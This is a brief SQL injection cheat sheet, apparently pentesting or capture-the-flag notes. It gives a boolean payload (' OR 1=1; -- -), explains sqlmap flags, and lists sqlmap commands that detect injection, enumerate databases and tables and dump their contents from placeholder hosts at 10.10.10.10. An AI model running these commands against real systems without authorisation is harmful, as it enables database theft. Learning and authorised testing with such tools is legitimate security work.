🟥SQL Injection

Boolean Attacks

' OR 1=1; -- -

sqlmap

Basic sqlmap command Scanning URL [GET Parameter]

sqlmap -u <url-to-check>

-u ==> specify url to check
-p ==> parameter to specify [eg, id]
--data=<post-String> ==> post string to use
--technique=U ==> Use Union Attacks
--technique=B ==> Use Boolean Attacks
--tables ==> Dump tables
-D ==> Specify Name of the Database
-T ==> Table Name to dump
--dump ==> Dump the content from the Database

Check if injection exists

sqlmap -r Post.req sqlmap -u "http://10.10.10.10/file.php?id=1" -p id sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin"

Get database if injection Exists

sqlmap -r login.req --dbs sqlmap -u "http://10.10.10.10/file.php?id=1" -p id --dbs sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" --dbs\

Get Tables in a Database

sqlmap -r login.req -D dbname --tables sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname --tables sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname --tables

Get data in a Database tables

sqlmap -r login.req -D dbname -T table_name --dump sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname -T table_name --dump sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname -T table_name --dump

JSQL Injection [GUI Software]

JSQL GUI is a GUI application that can fetch database from sql injection, From GET request [the parameter being in the URL as injection.php?id=123]